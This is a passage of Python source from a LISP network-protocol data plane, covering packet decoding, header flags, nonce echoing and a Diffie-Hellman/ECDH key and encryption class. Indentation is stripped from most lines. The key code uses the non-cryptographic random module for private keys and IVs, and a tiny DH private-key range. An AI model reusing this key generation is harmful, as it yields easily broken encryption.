if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
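#
# Example: MAC addresses arrive byte-swapped within each 16-bit word,
# so swap_mac("\x00\x11\x22\x33\x44\x55") returns
# "\x11\x00\x33\x22\x55\x44".
#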
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
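#
# Example: the folded 12-bit hash keeps the encap source port in the
# range 0xf000-0xffff while the destination port stays at the LISP
# data port (4341), so underlay routers doing 5-tuple ECMP spread
# flows across equal-cost paths without confusing the decapsulator.
#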
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
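#
# A minimal sketch (illustrative only, not referenced elsewhere in this
# file) showing how the flag masks above map onto the first long of a
# received data header:
#
def lisp_data_header_flags_example(packet):
    first_long = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    key_id = (first_long & LISP_K_BITS) >> 24
    has_iid = (first_long & LISP_I_BIT) != 0
    return([key_id, has_iid])
#enddef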
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
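#
# Usage sketch for the class above (illustrative only, not referenced
# elsewhere in this file): build a header carrying instance-id 1000,
# encode it to its 8-byte wire form, and decode it back.
#
def lisp_data_header_roundtrip_example():
    header = lisp_data_header()
    header.nonce(0x123456)
    header.instance_id(1000)
    encoded = header.encode()
    decoded = lisp_data_header()
    if (decoded.decode(encoded) == False): return(None)
    return(decoded.get_instance_id())
#enddef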
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start request-nonce mode with a new nonce. If a request-nonce is
# already stored, use the same nonce as last time regardless of
# whether we received an echo response. The set high-order bit tells
# the caller to set the e-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long it's been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If the last received echo was a while ago and a new request-nonce
# was sent recently, say the echo happened so we can bootstrap a new
# request and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
#endif
return(iv)
#enddef
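#
# Note the IV widths returned above match what decrypt() expects per
# cipher suite: 8 bytes for chacha, 12 bytes (4 high + 8 low) for
# aes-gcm, and the full 16 bytes for aes-cbc.
#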
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# it's a security risk to expose the shared-key (even though the
# entire key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
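#
# Derivation sketch: key_material is the 256-bit HMAC-SHA256 of the
# shared secret keyed by the context string, split down the middle:
#
#   encrypt-key = upper 128 bits, icv-key = lower 128 bits
#
# The icv-key is zero-filled to 32 hex digits for poly1305 and 40 for
# the sha256-based ICV.
#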
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in the cipher suite value, then insert the key-length and public
# key material. Do not negotiate the ECDH 25519 cipher suites if the
# curve25519 library is not installed on the system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64 bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
